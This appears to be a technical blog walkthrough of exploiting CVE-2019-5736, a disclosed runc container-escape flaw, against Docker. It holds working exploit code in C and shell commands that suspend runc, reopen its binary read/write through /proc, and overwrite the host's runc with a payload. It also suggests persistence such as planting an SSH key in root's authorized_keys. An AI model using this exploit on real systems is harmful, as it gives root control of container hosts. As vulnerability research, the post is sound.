Exploiting CVE-2019-5736 to Escalate Privileges

Introduction

A few days ago CVE-2019-5736, a container escape vulnerability in runc, was announced. runc is the container runtime that backs Docker, containerd, Kubernetes, etc. In short, this vulnerability let attackers get root privileges on the parent host by overwriting its copy of the runc binary from within the container. The replacement binary is fully attacker controlled and runs as root – pretty spooky. I’ll do a quick walkthrough of triggering the vulnerability and the exploit I wrote for it. If you want a more low level line-by-line walkthrough you can find them elsewhere.

If you want to skip straight to the exploit code (boo!) you can find it on my github.

Setting up the Environment

I decided to point my efforts at Docker since I already have familiarity with breaking out of its containers. As mentioned in the original email, this is a vulnerability in runc, so we’ll need to make sure that the version of Docker you have installed comes bundled with a vulnerable copy. Using apt to install an old version of Docker on Ubuntu, I noticed that runc was still the updated copy. To address this I went to the git repo and got a copy of the “latest” release which (at the time) was 45 commits behind master – meaning it didn’t have the security update. I downloaded the older pre-built copy and swapped them with the modern runc binaries on disk. You can find them here. Remember to make a copy of this binary. Successful exploitation of this vulnerability means overwriting your runc binary on disk so things will get messy.

Once you’ve got that set up, pick a container image to work from. I decided to use the default Ubuntu:18.04 image. I also added a shared directory to my parent host so I could develop the actual exploit there and have it immediately available for use in the container.

docker run -v /shared:/home/ancat/runcbug -i -t ubuntu:18.04 /bin/bash

Prerequisites

Exploiting this bug requires root inside the container, which is the default with Docker and Kubernetes (you should run these as dedicated unprivileged users where possible!) but like with all local privilege escalation exploits you still need some form of remote access. Generally this means you have one of two things:

  1. You have remote code execution against an application that runs in a container as root
  2. You have control over an arbitrary loaded Docker image loaded by the victim

I’ll cover exploiting this bug in the first scenario.

Exploitation

Triggering the Bug

In the patch Aleksa Sarai (runc maintainer) clones /proc/self/exe so that any references to it in the future do not point to the executable on the parent host’s filesystem. The easiest way to trigger the bug is to replace the entrypoint binary with a reference to /proc/self/exe. From the bug report we know the issue is that this will end up referring to the runc binary used by the parent host, so this is a good start. I did this by replacing /bin/bash with a shell script simply containing #!/proc/self/exe. Now if the parent host were to execute docker exec -it <container_name> bash they would execute the runc binary with two important caveats:

Let’s set up the trigger:

root@7338515f398b:/# echo '#!/proc/self/exe' > /proc/1/exe

... on the parent host ...

$ docker exec -it 7338515f398b /bin/bash
No help topic for '/bin/bash'

The loader now loads /proc/self/exe (pointing to the parents’ runc binary) when attempting to execute /bin/bash in the container. Essentially, the command being executed is /usr/bin/runc /bin/bash. This will be the process we attack to gain control over the original binary.

Interacting with the runc Process

For the route I took, the first part to successful exploitation is to suspend the runc process. I did that by sending a SIGSTOP signal to every runc process I could find in a tight loop. From my exploit code, this is how I did that.

printf("waiting for a target runc process...\n");
while (1) {
    target_pid = get_runc_pid();
    if (target_pid != 0) {
        printf("found a runc binary at pid=%d, suspending it so we can mess around\n", target_pid);
        kill(target_pid, 19); // stop
        break;
    }
}

With this process suspended, you can interact with it from your shell through /proc/ to take a peek inside.

# 48117 is the pid we suspended above
root@7338515f398b:/# ls -l /proc/48117/exe
lrwxrwxrwx 1 root root 0 Feb 13 06:16 /proc/48117/exe -> /usr/bin/runc

root@7338515f398b:/# /proc/48117/exe
NAME:
   runc - Open Container Initiative runtime

runc is a command line client for running applications packaged according to
the Open Container Initiative (OCI) format and is a compliant implementation of the
Open Container Initiative specification.
<truncated>

root@7338515f398b:/# echo poo > /proc/48117/exe
bash: /proc/48117/exe: Text file busy

ls -l shows us that /proc/<pid>/exe points to /usr/bin/runc. We can execute it and see that it is indeed runc, however we cannot write to it. It’s a common misconception that you can’t write to files that are already open by another process, but there is one exception on Linux: currently running executables. In fact, the error message Text file busy does not refer to traditional text files but instead refers to the text segment of a running binary.

Overwriting the Binary on the Host

We just saw we can interact with the runc process but couldn’t immediately achieve our goal of replacing the target binary. We can read from it, we can execute it, but we can’t write to it because the process is still running. To address that we can send the process a SIGCONT, resuming the process and ensuring it finishes executing. From my exploit, this is how I did that:

printf("letting the target process complete %d (kill -CONT)\n", target_pid);
if (kill(target_pid, 18) < 0) {
    perror("kill");
    exit(2);
}

However, in between stopping and resuming the target process we need to launch our attack some how. One of my first exploit attempts involved open("/proc/<runc pid>/exe", O_RDONLY); from a different process and then using fcntl to change the access mode to read/write. It went something like the following:

int fd = open("/proc/<runc pid>", O_RDONLY);
int flags = fcntl(fd, F_GETFL);
flags |= O_RDWR;
fcntl(fd, F_SETFL, flags);

Unfortunately it turns out that the access mode is one of the only two things fcntl will ignore (but not complain about!) So we need a new plan.

My next approach involved playing with /proc/<pid>/fd/ – interacting with another process’ file descriptors. On linux, you can take a look at another process’ open file descriptors by looking at its fd folder in the /proc/ filesystem. If you’ve ever used lsof, this is what it uses to show you all your open files. For example, a vim server.c process may have entries like the following:

$ ls -lah /proc/28034/fd/
total 0
dr-x------ 2 gremlin gremlin  0 Feb 17 02:25 .
dr-xr-xr-x 9 gremlin gremlin  0 Feb  5 02:55 ..
lrwx------ 1 gremlin gremlin 64 Feb 17 02:26 0 -> /dev/pts/33
lrwx------ 1 gremlin gremlin 64 Feb 17 02:26 1 -> /dev/pts/33
lrwx------ 1 gremlin gremlin 64 Feb 17 02:25 2 -> /dev/pts/33
lrwx------ 1 gremlin gremlin 64 Feb 17 02:26 4 -> /home/gremlin/.server.c.swp

The first three file descriptors are my input devices and the fourth one is vim’s swap file. The interesting part about accessing file descriptors this way is that while their access modes can’t directly be changed (eg via fcntl or otherwise), they can be reopened in a different access mode and still point at the same inode. That’s the exact strategy we’re going to use.

So to summarize, let’s jump right into the rest of the exploit:

printf("waiting for a target runc process...\n");
while (1) {
    target_pid = get_runc_pid();
    if (target_pid != 0) {
        printf("found a runc binary at pid=%d, suspending it so we can mess around\n", target_pid);
/*[1]*/ kill(target_pid, 19); // stop
        break;
    }
}

// ... truncated ...

char* runc_path;
asprintf(&runc_path, "/proc/%d/exe", target_pid);
printf("runc @ %s\n", runc_path);
/*[2]*/ int exe = open(runc_path, O_RDONLY);

// ... truncated ...

/*[3]*/ if (kill(target_pid, 18) < 0) {
    perror("kill");
    exit(2);
}
// ... truncated ...

int pid = fork();

if (pid == 0) {
    int parent = getppid();
    char* indirect_exe;
    asprintf(&indirect_exe, "/proc/%d/fd/3", parent);
    printf("opening parent's handle to exe as rw (%s)\n", indirect_exe);
    while(1) {
/*[4]*/ int indirect_fd = open(indirect_exe, O_RDWR | O_TRUNC);
        if (indirect_fd < 0) {
            continue;
        }

        printf("success! %d should be read write\n", indirect_fd);
/*[5]*/ int bytes_out = write(indirect_fd, payload, strlen(payload));
        close(indirect_fd);
        printf("success! replaced the host's runc binary with the payload (%d bytes out)\n", bytes_out);
        break;
    }
}

So at each annotated step, we:

  1. Suspend the runc process so we can take all the time we need.
  2. Open a read only handle to /proc/<runc process>/exe.
  3. Resume the runc process and let it finish so we don’t get the Text file busy error
  4. Open a read/write handle to /proc/<exploit pid>/fd/3.
  5. Write our payload to disk.

Because the process is finished executing at Step 3, /proc/<runc process>/exe no longer exists. However, we held onto a handle to that same exact inode in Step 2. At Step 4 we open that handle but this time in read/write mode, at which point we can write to that inode and thus replace the contents of the binary on the parent host.

Achieving Code Execution

At this point we’ve successfully replaced the contents of the runc binary on the host system. Next time this executes (almost any Docker command will do) our code will execute with root privileges. I intentionally glossed over this part in my exploit but your payload can pretty much do whatever: kill all the containers, drop an ssh key in /root/.ssh/authorized_keys, hotfix the vulnerability, etc. For a “production grade” exploit you would probably want to restore the runc binary after achieving persistence, otherwise you’ll probably break Docker.